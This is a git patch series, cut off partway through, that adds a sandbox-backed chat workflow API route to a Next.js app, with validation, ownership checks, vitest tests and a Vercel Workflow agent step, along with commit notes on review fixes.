From d20ac4e48895e45bac06dd93195513c9ef7da999 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 09:24:00 -0500 Subject: [PATCH 1/5] feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub-<uuid> header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. 
SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f650) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. 
Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/api/chat/workflow/route.ts | 34 ++++ .../handleChatWorkflowStream.test.ts | 165 ++++++++++++++++++ .../__tests__/validateChatWorkflow.test.ts | 142 +++++++++++++++ lib/chat/handleChatWorkflowStream.ts | 61 +++++++ lib/chat/validateChatWorkflow.ts | 61 +++++++ 5 files changed, 463 insertions(+) create mode 100644 app/api/chat/workflow/route.ts create mode 100644 lib/chat/__tests__/handleChatWorkflowStream.test.ts create mode 100644 lib/chat/__tests__/validateChatWorkflow.test.ts create mode 100644 lib/chat/handleChatWorkflowStream.ts create mode 100644 lib/chat/validateChatWorkflow.ts diff --git a/app/api/chat/workflow/route.ts b/app/api/chat/workflow/route.ts new file mode 100644 index 000000000..19445c03b --- /dev/null +++ b/app/api/chat/workflow/route.ts @@ -0,0 +1,34 @@ +import type { NextRequest } from "next/server"; +import { NextResponse } from "next/server"; +import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; +import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream"; + +export const maxDuration = 800; + +/** + * OPTIONS handler for CORS preflight requests. + * + * @returns A NextResponse with CORS headers. + */ +export async function OPTIONS() { + return new NextResponse(null, { + status: 200, + headers: getCorsHeaders(), + }); +} + +/** + * POST /api/chat/workflow + * + * Streams a sandbox-driven agent loop (Vercel Workflow) for an existing + * session + chat. Currently returns a hardcoded UIMessage stream stub — + * the workflow is wired up in a follow-up PR. + * + * Contract: https://developers.recoupable.com/api-reference/chat/workflow + * + * @param request - The incoming NextRequest. + * @returns A streaming Response (200) or a NextResponse error. 
+ */ +export async function POST(request: NextRequest): Promise<Response> { + return handleChatWorkflowStream(request); +} diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts new file mode 100644 index 000000000..c61911be8 --- /dev/null +++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts @@ -0,0 +1,165 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { NextRequest, NextResponse } from "next/server"; + +import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream"; +import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; +import { selectChats } from "@/lib/supabase/chats/selectChats"; +import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; + +vi.mock("@/lib/chat/validateChatWorkflow", () => ({ + validateChatWorkflow: vi.fn(), +})); +vi.mock("@/lib/supabase/sessions/selectSessions", () => ({ + selectSessions: vi.fn(), +})); +vi.mock("@/lib/supabase/chats/selectChats", () => ({ + selectChats: vi.fn(), +})); +vi.mock("@/lib/sandbox/isSandboxActive", () => ({ + isSandboxActive: vi.fn(), +})); +vi.mock("@/lib/networking/getCorsHeaders", () => ({ + getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })), +})); + +const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa"; +const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb"; +const SESSION_ID = "22222222-2222-2222-2222-222222222222"; +const CHAT_ID = "11111111-1111-1111-1111-111111111111"; + +function makeRequest(): NextRequest { + return new NextRequest("http://localhost/api/chat/workflow", { + method: "POST", + headers: { "x-api-key": "test-key", "content-type": "application/json" }, + body: JSON.stringify({ messages: [], chatId: CHAT_ID, sessionId: SESSION_ID }), + }); +} + +function mockValidatedRequest(overrides: Partial<{ accountId: string }> = {}) { + 
vi.mocked(validateChatWorkflow).mockResolvedValue({ + messages: [], + chatId: CHAT_ID, + sessionId: SESSION_ID, + accountId: overrides.accountId ?? ACCOUNT_ID, + orgId: null, + authToken: "test-key", + }); +} + +function mockOwnedSessionWithActiveSandbox() { + mockValidatedRequest(); + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + vi.mocked(selectChats).mockResolvedValue([{ id: CHAT_ID, session_id: SESSION_ID } as never]); + vi.mocked(isSandboxActive).mockReturnValue(true); +} + +describe("handleChatWorkflowStream (stub)", () => { + beforeEach(() => { + vi.clearAllMocks(); + }); + + describe("validation short-circuits", () => { + it("returns the validator's short-circuit response unchanged (e.g. 401)", async () => { + const authError = NextResponse.json( + { status: "error", error: "Unauthorized" }, + { status: 401 }, + ); + vi.mocked(validateChatWorkflow).mockResolvedValue(authError); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(401); + }); + + it("returns the validator's 400 unchanged (e.g. 
invalid body)", async () => { + const badBody = NextResponse.json( + { status: "error", error: "Invalid JSON body" }, + { status: 400 }, + ); + vi.mocked(validateChatWorkflow).mockResolvedValue(badBody); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(400); + }); + }); + + describe("session / chat ownership", () => { + beforeEach(() => mockValidatedRequest()); + + it("returns 404 when the session does not exist", async () => { + vi.mocked(selectSessions).mockResolvedValue([]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(404); + }); + + it("returns 500 when selectSessions errors (returns null)", async () => { + vi.mocked(selectSessions).mockResolvedValue(null); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(500); + }); + + it("returns 403 when the session is owned by a different account", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(403); + }); + + it("returns 400 'Sandbox not initialized' when sandbox is inactive", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: null } as never, + ]); + vi.mocked(isSandboxActive).mockReturnValue(false); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(400); + const body = await res.json(); + expect(body.error).toMatch(/sandbox/i); + }); + + it("returns 404 when the chat does not exist", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + vi.mocked(isSandboxActive).mockReturnValue(true); + vi.mocked(selectChats).mockResolvedValue([]); + const res = await handleChatWorkflowStream(makeRequest()); + 
expect(res.status).toBe(404); + }); + + it("returns 404 when chat exists but belongs to a different session", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + vi.mocked(isSandboxActive).mockReturnValue(true); + vi.mocked(selectChats).mockResolvedValue([ + { id: CHAT_ID, session_id: "different-session" } as never, + ]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(404); + }); + }); + + describe("success (stub response)", () => { + beforeEach(() => mockOwnedSessionWithActiveSandbox()); + + it("returns 200 with text/event-stream content type", async () => { + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(200); + expect(res.headers.get("content-type") ?? "").toMatch(/text\/event-stream/); + }); + + it("sets an x-workflow-run-id response header starting with stub-", async () => { + const res = await handleChatWorkflowStream(makeRequest()); + const runId = res.headers.get("x-workflow-run-id"); + expect(runId).toBeTruthy(); + expect(runId!.startsWith("stub-")).toBe(true); + }); + + it("emits a stream body that includes the stub assistant text", async () => { + const res = await handleChatWorkflowStream(makeRequest()); + const text = await res.text(); + expect(text).toContain("Hello from /api/chat/workflow"); + }); + }); +}); diff --git a/lib/chat/__tests__/validateChatWorkflow.test.ts b/lib/chat/__tests__/validateChatWorkflow.test.ts new file mode 100644 index 000000000..8eb9457c2 --- /dev/null +++ b/lib/chat/__tests__/validateChatWorkflow.test.ts @@ -0,0 +1,142 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { NextRequest, NextResponse } from "next/server"; + +import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { validateAuthContext } from "@/lib/auth/validateAuthContext"; + +vi.mock("@/lib/auth/validateAuthContext", () => ({ + 
validateAuthContext: vi.fn(), +})); + +const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa"; +const CHAT_ID = "11111111-1111-1111-1111-111111111111"; +const SESSION_ID = "22222222-2222-2222-2222-222222222222"; + +const validBody = { + messages: [{ id: "m-1", role: "user", parts: [{ type: "text", text: "hi" }] }], + chatId: CHAT_ID, + sessionId: SESSION_ID, +}; + +function makeRequest(body: unknown = validBody): NextRequest { + return new NextRequest("http://localhost/api/chat/workflow", { + method: "POST", + headers: { "x-api-key": "k", "content-type": "application/json" }, + body: typeof body === "string" ? body : JSON.stringify(body), + }); +} + +function mockAuthOk() { + vi.mocked(validateAuthContext).mockResolvedValue({ + accountId: ACCOUNT_ID, + orgId: null, + authToken: "k", + }); +} + +describe("validateChatWorkflow", () => { + beforeEach(() => vi.clearAllMocks()); + + describe("valid input", () => { + beforeEach(() => mockAuthOk()); + + it("returns the validated body augmented with accountId / orgId / authToken", async () => { + const result = await validateChatWorkflow(makeRequest()); + expect(result).not.toBeInstanceOf(NextResponse); + if (result instanceof NextResponse) return; + expect(result.chatId).toBe(CHAT_ID); + expect(result.sessionId).toBe(SESSION_ID); + expect(result.messages).toEqual(validBody.messages); + expect(result.accountId).toBe(ACCOUNT_ID); + expect(result.orgId).toBe(null); + expect(result.authToken).toBe("k"); + }); + + it("accepts an optional context.contextLimit integer", async () => { + const result = await validateChatWorkflow( + makeRequest({ ...validBody, context: { contextLimit: 50 } }), + ); + expect(result).not.toBeInstanceOf(NextResponse); + if (result instanceof NextResponse) return; + expect(result.context?.contextLimit).toBe(50); + }); + + it("accepts an empty messages array", async () => { + const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: [] })); + 
expect(result).not.toBeInstanceOf(NextResponse); + }); + }); + + describe("invalid body", () => { + it("returns 400 when JSON is malformed", async () => { + const req = new NextRequest("http://localhost/api/chat/workflow", { + method: "POST", + headers: { "x-api-key": "k", "content-type": "application/json" }, + body: "{not-json", + }); + const result = await validateChatWorkflow(req); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when chatId is missing", async () => { + const { chatId: _omit, ...rest } = validBody; + const result = await validateChatWorkflow(makeRequest(rest)); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when sessionId is missing", async () => { + const { sessionId: _omit, ...rest } = validBody; + const result = await validateChatWorkflow(makeRequest(rest)); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when messages is not an array", async () => { + const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: "nope" })); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when chatId is empty string", async () => { + const result = await validateChatWorkflow(makeRequest({ ...validBody, chatId: "" })); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when context.contextLimit is not an integer", async () => { + const result = await validateChatWorkflow( + makeRequest({ ...validBody, context: { contextLimit: "fifty" } }), + ); + expect(result).toBeInstanceOf(NextResponse); + if (!(result 
instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("does not call validateAuthContext when body validation fails", async () => { + const { chatId: _omit, ...rest } = validBody; + await validateChatWorkflow(makeRequest(rest)); + expect(validateAuthContext).not.toHaveBeenCalled(); + }); + }); + + describe("auth", () => { + it("returns the auth short-circuit response when validateAuthContext rejects", async () => { + const authError = NextResponse.json( + { status: "error", error: "Unauthorized" }, + { status: 401 }, + ); + vi.mocked(validateAuthContext).mockResolvedValue(authError); + const result = await validateChatWorkflow(makeRequest()); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(401); + }); + }); +}); diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts new file mode 100644 index 000000000..137f699cb --- /dev/null +++ b/lib/chat/handleChatWorkflowStream.ts @@ -0,0 +1,61 @@ +import { NextRequest, NextResponse } from "next/server"; +import { createUIMessageStream, createUIMessageStreamResponse } from "ai"; +import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; +import { selectChats } from "@/lib/supabase/chats/selectChats"; +import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; +import { errorResponse } from "@/lib/networking/errorResponse"; +import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; +import generateUUID from "@/lib/uuid/generateUUID"; + +/** + * Handles POST /api/chat/workflow. + * + * Stub implementation: delegates auth + body validation to validateChatWorkflow, + * verifies ownership of the referenced session + chat, confirms the session's + * sandbox is active, then returns a hardcoded UIMessage stream with an + * `x-workflow-run-id` header. 
The Vercel Workflow that will eventually drive + * the agent loop is wired up in a follow-up PR — this stub exists so clients + * can integrate against the contract documented at + * /api-reference/chat/workflow. + * + * @param request - The incoming NextRequest + * @returns A streaming Response (200) or a NextResponse error. + */ +export async function handleChatWorkflowStream(request: NextRequest): Promise<Response> { + const validated = await validateChatWorkflow(request); + if (validated instanceof NextResponse) return validated; + + const sessions = await selectSessions({ id: validated.sessionId }); + if (sessions === null) return errorResponse("Internal server error", 500); + const session = sessions[0]; + if (!session) return errorResponse("Session not found", 404); + if (session.account_id !== validated.accountId) return errorResponse("Forbidden", 403); + if (!isSandboxActive(session)) return errorResponse("Sandbox not initialized", 400); + + const chats = await selectChats({ id: validated.chatId }); + const chat = chats[0]; + if (!chat || chat.session_id !== validated.sessionId) { + return errorResponse("Chat not found", 404); + } + + const runId = `stub-${generateUUID()}`; + + const stream = createUIMessageStream({ + generateId: generateUUID, + execute: ({ writer }) => { + const id = generateUUID(); + writer.write({ type: "text-start", id }); + writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" }); + writer.write({ type: "text-end", id }); + }, + }); + + return createUIMessageStreamResponse({ + stream, + headers: { + ...getCorsHeaders(), + "x-workflow-run-id": runId, + }, + }); +} diff --git a/lib/chat/validateChatWorkflow.ts b/lib/chat/validateChatWorkflow.ts new file mode 100644 index 000000000..4fd8e6c66 --- /dev/null +++ b/lib/chat/validateChatWorkflow.ts @@ -0,0 +1,61 @@ +import type { NextRequest } from "next/server"; +import { NextResponse } from "next/server"; +import { z } from "zod"; +import { validateAuthContext } from 
"@/lib/auth/validateAuthContext"; +import { errorResponse } from "@/lib/networking/errorResponse"; +import { validationErrorResponse } from "@/lib/zod/validationErrorResponse"; + +export const chatWorkflowBodySchema = z.object({ + messages: z.array(z.any()), + chatId: z.string().min(1, "chatId is required"), + sessionId: z.string().min(1, "sessionId is required"), + context: z + .object({ + contextLimit: z.number().int("contextLimit must be an integer"), + }) + .optional(), +}); + +export type ChatWorkflowBody = z.infer<typeof chatWorkflowBodySchema>; + +export type ChatWorkflowRequest = ChatWorkflowBody & { + accountId: string; + orgId: string | null; + authToken?: string; +}; + +/** + * Validates a POST /api/chat/workflow request end-to-end: parses the JSON + * body, validates it against the schema, and runs auth via + * validateAuthContext. Returns a NextResponse error short-circuit (400/401/403) + * or the typed body augmented with the authenticated accountId / orgId / token. + * + * @param request - The incoming NextRequest. + * @returns A NextResponse error or the validated, auth-augmented request. 
+ */ +export async function validateChatWorkflow( + request: NextRequest, +): Promise<NextResponse | ChatWorkflowRequest> { + let rawBody: unknown; + try { + rawBody = await request.json(); + } catch { + return errorResponse("Invalid JSON body", 400); + } + + const parsed = chatWorkflowBodySchema.safeParse(rawBody); + if (!parsed.success) { + const firstError = parsed.error.issues[0]; + return validationErrorResponse(firstError.message, firstError.path); + } + + const auth = await validateAuthContext(request); + if (auth instanceof NextResponse) return auth; + + return { + ...parsed.data, + accountId: auth.accountId, + orgId: auth.orgId, + authToken: auth.authToken, + }; +} From f9efbea9e269bdb6980656e5e35e483b30705d66 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 12:07:35 -0500 Subject: [PATCH 2/5] feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-`) are replaced with real ones (`wrun_`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. 
What's now plumbed end-to-end: - validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header New helpers (Supabase): - compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id - touchChat — bump chats.updated_at - updateChat — generic partial update mirroring updateSession's shape - createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert - isFirstChatMessage — true iff exactly one row exists matching messageId New helpers (chat/recoupable): - extractOrgId — `org--` → uuid (lowercased) - agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt - persistLatestUserMessage — fire-and-forget user msg + title-from-first-80 - reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop New workflow files: - app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper - app/workflows/runAgentStep.ts — `"use step"`, single streamText turn Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean. Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today. 
Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): address PR review — structural + P1/P2 fixes Sweetman structural feedback (KISS / OCP): - Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts - Generic Supabase helpers + domain wrappers: - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted). - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs. - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors. - Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently). cubic P1 fixes: - CAS-before-start: handler now claims `active_stream_id` with a `pending-` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id. - updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors. - reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error). - await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch. cubic P2 fixes: - updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at). 
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix. - runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure. - runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit. Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): top-level import in reconcileExistingActiveStream The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency. Also tightens the cancel-throws handler test to use the same deferred- rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): move active_stream_id CAS out of supabase lib Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured: - `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib. - `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result. Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline. 
- Handler + reconcile updated to use the wrapper. Tests follow. 37/37 tests in touched files pass; full suite 2955/2955; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR). 1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks. 2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...) .update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder). Both bugs were behavior-neutral — the function shape and contract are unchanged. 37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds. 
Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/lib/workflows/runAgentStep.ts | 55 ++++ app/lib/workflows/runAgentWorkflow.ts | 56 ++++ .../compareAndSetChatActiveStreamId.test.ts | 51 +++ .../handleChatWorkflowStream.test.ts | 301 ++++++++++++++---- .../__tests__/maybeResumeChatStream.test.ts | 46 +++ .../persistLatestUserMessage.test.ts | 129 ++++++++ .../reconcileExistingActiveStream.test.ts | 92 ++++++ lib/chat/agentCustomInstructions.ts | 9 + lib/chat/assistantFileLinks.ts | 28 ++ lib/chat/compareAndSetChatActiveStreamId.ts | 49 +++ lib/chat/handleChatWorkflowStream.ts | 100 ++++-- lib/chat/maybeResumeChatStream.ts | 40 +++ lib/chat/persistLatestUserMessage.ts | 84 +++++ lib/chat/reconcileExistingActiveStream.ts | 56 ++++ lib/chat/recoupApiSkillPrompt.ts | 11 + lib/recoupable/__tests__/extractOrgId.test.ts | 57 ++++ lib/recoupable/extractOrgId.ts | 31 ++ .../__tests__/selectChatMessages.test.ts | 58 ++++ .../__tests__/upsertChatMessage.test.ts | 46 +++ .../chat_messages/selectChatMessages.ts | 40 +++ .../chat_messages/upsertChatMessage.ts | 37 +++ .../chats/__tests__/updateChat.test.ts | 110 +++++++ lib/supabase/chats/updateChat.ts | 86 +++++ 23 files changed, 1478 insertions(+), 94 deletions(-) create mode 100644 app/lib/workflows/runAgentStep.ts create mode 100644 app/lib/workflows/runAgentWorkflow.ts create mode 100644 lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts create mode 100644 lib/chat/__tests__/maybeResumeChatStream.test.ts create mode 100644 lib/chat/__tests__/persistLatestUserMessage.test.ts create mode 100644 lib/chat/__tests__/reconcileExistingActiveStream.test.ts create mode 100644 lib/chat/agentCustomInstructions.ts create mode 100644 lib/chat/assistantFileLinks.ts create mode 100644 lib/chat/compareAndSetChatActiveStreamId.ts create mode 100644 lib/chat/maybeResumeChatStream.ts create mode 100644 lib/chat/persistLatestUserMessage.ts create mode 100644 
lib/chat/reconcileExistingActiveStream.ts create mode 100644 lib/chat/recoupApiSkillPrompt.ts create mode 100644 lib/recoupable/__tests__/extractOrgId.test.ts create mode 100644 lib/recoupable/extractOrgId.ts create mode 100644 lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts create mode 100644 lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts create mode 100644 lib/supabase/chat_messages/selectChatMessages.ts create mode 100644 lib/supabase/chat_messages/upsertChatMessage.ts create mode 100644 lib/supabase/chats/__tests__/updateChat.test.ts create mode 100644 lib/supabase/chats/updateChat.ts diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts new file mode 100644 index 000000000..352dcd265 --- /dev/null +++ b/app/lib/workflows/runAgentStep.ts @@ -0,0 +1,55 @@ +import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai"; +import { gateway } from "@ai-sdk/gateway"; +import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions"; + +export type RunAgentStepInput = { + messages: UIMessage[]; + modelId: string; + writable: WritableStream<UIMessageChunk>; +}; + +/** + * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow + * `"use step"` so that: + * + * - Sandbox-banned APIs (`fetch`, `setTimeout`, `crypto`) are legal inside. + * - The result is cached as a single durable event — replays after a crash + * do not re-bill the model. + * + * Currently emits a plain text response with no tools. Sandbox tools land in + * the follow-up PR (port `@open-harness/agent` tools + wire via + * `experimental_context`). + * + * @param input - Messages + selected model + the workflow's writable stream. + * @returns finishReason from the model run (for the workflow loop's break condition). 
+ */ +export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> { + "use step"; + + console.log("[runAgentStep] start", { + modelId: input.modelId, + messageCount: input.messages.length, + }); + + const modelMessages = convertToModelMessages(input.messages); + const result = streamText({ + model: gateway(input.modelId), + system: agentCustomInstructions, + messages: modelMessages, + }); + + // Acquire the writer once and release in `finally` — re-acquiring per chunk + // (the previous shape) leaked the lock when any write threw. + const writer = input.writable.getWriter(); + try { + for await (const part of result.toUIMessageStream()) { + await writer.write(part); + } + } finally { + writer.releaseLock(); + } + + const finishReason = await result.finishReason; + console.log("[runAgentStep] finish", { finishReason }); + return { finishReason }; +} diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts new file mode 100644 index 000000000..db679145a --- /dev/null +++ b/app/lib/workflows/runAgentWorkflow.ts @@ -0,0 +1,56 @@ +import { getWritable } from "workflow"; +import type { UIMessage, UIMessageChunk } from "ai"; +import { runAgentStep } from "@/app/lib/workflows/runAgentStep"; + +export type RunAgentWorkflowInput = { + messages: UIMessage[]; + chatId: string; + sessionId: string; + modelId: string; 